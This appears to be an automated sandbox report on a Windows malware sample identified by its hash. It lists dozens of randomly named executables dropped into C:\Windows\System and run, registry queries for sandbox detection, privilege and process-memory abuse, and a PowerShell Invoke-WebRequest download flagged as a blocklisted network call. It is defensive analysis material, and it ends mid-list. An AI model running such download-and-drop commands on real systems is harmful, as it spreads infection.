File created	C:\Windows\System\vEMZmJH.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\eQOPfDH.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\HMRkTqL.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ZIFjToJ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\QcedxxY.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\TjuQZtm.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\FdrpWqK.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\bXNQojM.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\TRWIqsa.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\NHFGuck.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\iYgRIDj.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\KtlxnoQ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\nSzqNbW.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\NhsRMqY.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\vRyYXRE.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\PhBBeaR.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\khzMTvs.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\jtdLiWA.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\zvybAuk.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\DYlFONl.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\rtNPQCT.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\CzUTEao.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ssycpCj.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\QDapzld.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\cYwDZVb.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ZHoCPfF.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\RXCqJDi.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\bkotiEG.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\vWqgAbe.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\mSdJbQV.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\INeHkjQ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\OoMBlzV.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ZTGFnnx.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\PtsKSBi.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\izyIKBk.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\WJrKzdv.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\DYHyrwL.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\CKDDmPc.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\tCVRohe.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\DSaVToW.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\YkAPSEY.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\OLcdAzE.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ODJJghK.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\capAJgZ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\qUSgeMh.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\wBJOtDo.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\qMXzinA.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\ocxSMne.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\unbCwui.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\XeJbnoQ.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\QVPsHkt.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\cSPpogL.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\RNaJwAz.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\haVkLFc.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\vFwnZoT.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\dvpOuAY.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\VWnIHRd.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\PqQwzmN.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\qSuxCLb.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
File created	C:\Windows\System\MzhnVDP.exe	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
228	powershell.exe
228	powershell.exe
228	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeLockMemoryPrivilege	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4564 wrote to memory of 228	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	90
PID 4564 wrote to memory of 228	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	90
PID 4564 wrote to memory of 2184	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	91
PID 4564 wrote to memory of 2184	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	91
PID 4564 wrote to memory of 4312	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	92
PID 4564 wrote to memory of 4312	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	92
PID 4564 wrote to memory of 4804	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	93
PID 4564 wrote to memory of 4804	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	93
PID 4564 wrote to memory of 2044	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	94
PID 4564 wrote to memory of 2044	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	94
PID 4564 wrote to memory of 3952	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	95
PID 4564 wrote to memory of 3952	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	95
PID 4564 wrote to memory of 388	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	96
PID 4564 wrote to memory of 388	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	96
PID 4564 wrote to memory of 876	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	97
PID 4564 wrote to memory of 876	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	97
PID 4564 wrote to memory of 1712	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	98
PID 4564 wrote to memory of 1712	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	98
PID 4564 wrote to memory of 4476	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	99
PID 4564 wrote to memory of 4476	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	99
PID 4564 wrote to memory of 2264	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	100
PID 4564 wrote to memory of 2264	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	100
PID 4564 wrote to memory of 4516	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	101
PID 4564 wrote to memory of 4516	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	101
PID 4564 wrote to memory of 2924	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	102
PID 4564 wrote to memory of 2924	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	102
PID 4564 wrote to memory of 2808	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	103
PID 4564 wrote to memory of 2808	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	103
PID 4564 wrote to memory of 2908	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	104
PID 4564 wrote to memory of 2908	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	104
PID 4564 wrote to memory of 752	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	105
PID 4564 wrote to memory of 752	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	105
PID 4564 wrote to memory of 4740	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	106
PID 4564 wrote to memory of 4740	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	106
PID 4564 wrote to memory of 2000	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	107
PID 4564 wrote to memory of 2000	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	107
PID 4564 wrote to memory of 1608	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	108
PID 4564 wrote to memory of 1608	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	108
PID 4564 wrote to memory of 4448	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	109
PID 4564 wrote to memory of 4448	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	109
PID 4564 wrote to memory of 1432	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	110
PID 4564 wrote to memory of 1432	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	110
PID 4564 wrote to memory of 3500	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	111
PID 4564 wrote to memory of 3500	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	111
PID 4564 wrote to memory of 1148	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	112
PID 4564 wrote to memory of 1148	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	112
PID 4564 wrote to memory of 1928	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	113
PID 4564 wrote to memory of 1928	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	113
PID 4564 wrote to memory of 1844	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	114
PID 4564 wrote to memory of 1844	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	114
PID 4564 wrote to memory of 1348	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	115
PID 4564 wrote to memory of 1348	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	115
PID 4564 wrote to memory of 4952	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	116
PID 4564 wrote to memory of 4952	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	116
PID 4564 wrote to memory of 3356	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	117
PID 4564 wrote to memory of 3356	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	117
PID 4564 wrote to memory of 1212	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	118
PID 4564 wrote to memory of 1212	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	118
PID 4564 wrote to memory of 2076	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	119
PID 4564 wrote to memory of 2076	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	119
PID 4564 wrote to memory of 2996	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	120
PID 4564 wrote to memory of 2996	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	120
PID 4564 wrote to memory of 2896	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	121
PID 4564 wrote to memory of 2896	4564	04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe	121

C:\Users\Admin\AppData\Local\Temp\04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe
"C:\Users\Admin\AppData\Local\Temp\04b708fad2bcc13140baa7563d5fb25d46d3c9f44f128662a9000be4cee25f3c.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:228
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "228" "2876" "1916" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5656
- C:\Windows\System\hUcinQu.exe
  C:\Windows\System\hUcinQu.exe
  2⤵
  - Executes dropped EXE
  PID:2184
- C:\Windows\System\NaLeQQQ.exe
  C:\Windows\System\NaLeQQQ.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\nZgZiEm.exe
  C:\Windows\System\nZgZiEm.exe
  2⤵
  - Executes dropped EXE
  PID:4804
- C:\Windows\System\TwWkKAd.exe
  C:\Windows\System\TwWkKAd.exe
  2⤵
  - Executes dropped EXE
  PID:2044
- C:\Windows\System\MMimTlZ.exe
  C:\Windows\System\MMimTlZ.exe
  2⤵
  - Executes dropped EXE
  PID:3952
- C:\Windows\System\CKFyfkI.exe
  C:\Windows\System\CKFyfkI.exe
  2⤵
  - Executes dropped EXE
  PID:388
- C:\Windows\System\uDWnIcl.exe
  C:\Windows\System\uDWnIcl.exe
  2⤵
  - Executes dropped EXE
  PID:876
- C:\Windows\System\zvybAuk.exe
  C:\Windows\System\zvybAuk.exe
  2⤵
  - Executes dropped EXE
  PID:1712
- C:\Windows\System\AUYfADW.exe
  C:\Windows\System\AUYfADW.exe
  2⤵
  - Executes dropped EXE
  PID:4476
- C:\Windows\System\vJvYviL.exe
  C:\Windows\System\vJvYviL.exe
  2⤵
  - Executes dropped EXE
  PID:2264
- C:\Windows\System\ETEnkYy.exe
  C:\Windows\System\ETEnkYy.exe
  2⤵
  - Executes dropped EXE
  PID:4516
- C:\Windows\System\uWpGyrV.exe
  C:\Windows\System\uWpGyrV.exe
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\Windows\System\KnoBmgk.exe
  C:\Windows\System\KnoBmgk.exe
  2⤵
  - Executes dropped EXE
  PID:2808
- C:\Windows\System\NskCeVV.exe
  C:\Windows\System\NskCeVV.exe
  2⤵
  - Executes dropped EXE
  PID:2908
- C:\Windows\System\ptfjZQo.exe
  C:\Windows\System\ptfjZQo.exe
  2⤵
  - Executes dropped EXE
  PID:752
- C:\Windows\System\yUAMmcn.exe
  C:\Windows\System\yUAMmcn.exe
  2⤵
  - Executes dropped EXE
  PID:4740
- C:\Windows\System\YAltuKb.exe
  C:\Windows\System\YAltuKb.exe
  2⤵
  - Executes dropped EXE
  PID:2000
- C:\Windows\System\wQALDiZ.exe
  C:\Windows\System\wQALDiZ.exe
  2⤵
  - Executes dropped EXE
  PID:1608
- C:\Windows\System\JfoCqMF.exe
  C:\Windows\System\JfoCqMF.exe
  2⤵
  - Executes dropped EXE
  PID:4448
- C:\Windows\System\GCzFJde.exe
  C:\Windows\System\GCzFJde.exe
  2⤵
  - Executes dropped EXE
  PID:1432
- C:\Windows\System\wYwxQXJ.exe
  C:\Windows\System\wYwxQXJ.exe
  2⤵
  - Executes dropped EXE
  PID:3500
- C:\Windows\System\iKthoOq.exe
  C:\Windows\System\iKthoOq.exe
  2⤵
  - Executes dropped EXE
  PID:1148
- C:\Windows\System\LuNBsxY.exe
  C:\Windows\System\LuNBsxY.exe
  2⤵
  - Executes dropped EXE
  PID:1928
- C:\Windows\System\tdrocVb.exe
  C:\Windows\System\tdrocVb.exe
  2⤵
  - Executes dropped EXE
  PID:1844
- C:\Windows\System\xZiMCws.exe
  C:\Windows\System\xZiMCws.exe
  2⤵
  - Executes dropped EXE
  PID:1348
- C:\Windows\System\BAiBetq.exe
  C:\Windows\System\BAiBetq.exe
  2⤵
  - Executes dropped EXE
  PID:4952
- C:\Windows\System\EftSbQY.exe
  C:\Windows\System\EftSbQY.exe
  2⤵
  - Executes dropped EXE
  PID:3356
- C:\Windows\System\BHhNnGv.exe
  C:\Windows\System\BHhNnGv.exe
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Windows\System\JMbQljf.exe
  C:\Windows\System\JMbQljf.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\RZhjzCv.exe
  C:\Windows\System\RZhjzCv.exe
  2⤵
  - Executes dropped EXE
  PID:2996
- C:\Windows\System\ufCzghf.exe
  C:\Windows\System\ufCzghf.exe
  2⤵
  - Executes dropped EXE
  PID:2896
- C:\Windows\System\pBWjpKp.exe
  C:\Windows\System\pBWjpKp.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\OcJNMJQ.exe
  C:\Windows\System\OcJNMJQ.exe
  2⤵
  - Executes dropped EXE
  PID:3568
- C:\Windows\System\PCmzCJy.exe
  C:\Windows\System\PCmzCJy.exe
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Windows\System\mpEuXEN.exe
  C:\Windows\System\mpEuXEN.exe
  2⤵
  - Executes dropped EXE
  PID:4692
- C:\Windows\System\MEuqDPP.exe
  C:\Windows\System\MEuqDPP.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\BwmGijC.exe
  C:\Windows\System\BwmGijC.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\OtwZOxs.exe
  C:\Windows\System\OtwZOxs.exe
  2⤵
  - Executes dropped EXE
  PID:1828
- C:\Windows\System\QaWvnkJ.exe
  C:\Windows\System\QaWvnkJ.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\fQmQoDK.exe
  C:\Windows\System\fQmQoDK.exe
  2⤵
  - Executes dropped EXE
  PID:2260
- C:\Windows\System\RxJDeQX.exe
  C:\Windows\System\RxJDeQX.exe
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Windows\System\rQTTGeN.exe
  C:\Windows\System\rQTTGeN.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\BzWZguV.exe
  C:\Windows\System\BzWZguV.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\ZnwPCyN.exe
  C:\Windows\System\ZnwPCyN.exe
  2⤵
  - Executes dropped EXE
  PID:3040
- C:\Windows\System\xkogqAH.exe
  C:\Windows\System\xkogqAH.exe
  2⤵
  - Executes dropped EXE
  PID:1112
- C:\Windows\System\cYDVPHH.exe
  C:\Windows\System\cYDVPHH.exe
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Windows\System\iORDXhS.exe
  C:\Windows\System\iORDXhS.exe
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Windows\System\xbQoZgh.exe
  C:\Windows\System\xbQoZgh.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\System\FnJBSlh.exe
  C:\Windows\System\FnJBSlh.exe
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Windows\System\iNJaUie.exe
  C:\Windows\System\iNJaUie.exe
  2⤵
  - Executes dropped EXE
  PID:3684
- C:\Windows\System\xJCJoFX.exe
  C:\Windows\System\xJCJoFX.exe
  2⤵
  - Executes dropped EXE
  PID:2148
- C:\Windows\System\tBvaqeC.exe
  C:\Windows\System\tBvaqeC.exe
  2⤵
  - Executes dropped EXE
  PID:3580
- C:\Windows\System\NyxQtRg.exe
  C:\Windows\System\NyxQtRg.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\yobiuBf.exe
  C:\Windows\System\yobiuBf.exe
  2⤵
  - Executes dropped EXE
  PID:4160
- C:\Windows\System\OiNZjcC.exe
  C:\Windows\System\OiNZjcC.exe
  2⤵
  - Executes dropped EXE
  PID:380
- C:\Windows\System\AQhbrBT.exe
  C:\Windows\System\AQhbrBT.exe
  2⤵
  - Executes dropped EXE
  PID:5124
- C:\Windows\System\tdtbaaQ.exe
  C:\Windows\System\tdtbaaQ.exe
  2⤵
  - Executes dropped EXE
  PID:5140
- C:\Windows\System\rNRvvVF.exe
  C:\Windows\System\rNRvvVF.exe
  2⤵
  - Executes dropped EXE
  PID:5156
- C:\Windows\System\LReqEyX.exe
  C:\Windows\System\LReqEyX.exe
  2⤵
  - Executes dropped EXE
  PID:5188
- C:\Windows\System\CLuglLq.exe
  C:\Windows\System\CLuglLq.exe
  2⤵
  - Executes dropped EXE
  PID:5204
- C:\Windows\System\XitlLGY.exe
  C:\Windows\System\XitlLGY.exe
  2⤵
  - Executes dropped EXE
  PID:5220
- C:\Windows\System\VakGUXC.exe
  C:\Windows\System\VakGUXC.exe
  2⤵
  - Executes dropped EXE
  PID:5236
- C:\Windows\System\Wikxnjq.exe
  C:\Windows\System\Wikxnjq.exe
  2⤵
  - Executes dropped EXE
  PID:5260
- C:\Windows\System\snGiSuM.exe
  C:\Windows\System\snGiSuM.exe
  2⤵
  - Executes dropped EXE
  PID:5276
- C:\Windows\System\pnmTFqA.exe
  C:\Windows\System\pnmTFqA.exe
  2⤵
  PID:5292
- C:\Windows\System\SWFhTVR.exe
  C:\Windows\System\SWFhTVR.exe
  2⤵
  PID:5316
- C:\Windows\System\JcGaQcG.exe
  C:\Windows\System\JcGaQcG.exe
  2⤵
  PID:5384
- C:\Windows\System\kVyNYlH.exe
  C:\Windows\System\kVyNYlH.exe
  2⤵
  PID:5400
- C:\Windows\System\GFsmvbY.exe
  C:\Windows\System\GFsmvbY.exe
  2⤵
  PID:5416
- C:\Windows\System\jWTxSWG.exe
  C:\Windows\System\jWTxSWG.exe
  2⤵
  PID:5472
- C:\Windows\System\zHsuWyU.exe
  C:\Windows\System\zHsuWyU.exe
  2⤵
  PID:5508
- C:\Windows\System\xzwMMun.exe
  C:\Windows\System\xzwMMun.exe
  2⤵
  PID:5524
- C:\Windows\System\ZJYdaMH.exe
  C:\Windows\System\ZJYdaMH.exe
  2⤵
  PID:5540
- C:\Windows\System\UbZwCbt.exe
  C:\Windows\System\UbZwCbt.exe
  2⤵
  PID:5568
- C:\Windows\System\OeZvOjb.exe
  C:\Windows\System\OeZvOjb.exe
  2⤵
  PID:5592
- C:\Windows\System\ohrOonv.exe
  C:\Windows\System\ohrOonv.exe
  2⤵
  PID:5608
- C:\Windows\System\fPozMXr.exe
  C:\Windows\System\fPozMXr.exe
  2⤵
  PID:5628
- C:\Windows\System\LAjZQJg.exe
  C:\Windows\System\LAjZQJg.exe
  2⤵
  PID:5688
- C:\Windows\System\uHKpUfg.exe
  C:\Windows\System\uHKpUfg.exe
  2⤵
  PID:5704
- C:\Windows\System\mffSolg.exe
  C:\Windows\System\mffSolg.exe
  2⤵
  PID:5720
- C:\Windows\System\GvLTtcQ.exe
  C:\Windows\System\GvLTtcQ.exe
  2⤵
  PID:5744
- C:\Windows\System\PneXpwd.exe
  C:\Windows\System\PneXpwd.exe
  2⤵
  PID:5764
- C:\Windows\System\XYUKCTV.exe
  C:\Windows\System\XYUKCTV.exe
  2⤵
  PID:5948
- C:\Windows\System\wJCoSgm.exe
  C:\Windows\System\wJCoSgm.exe
  2⤵
  PID:5968
- C:\Windows\System\jQpRPUZ.exe
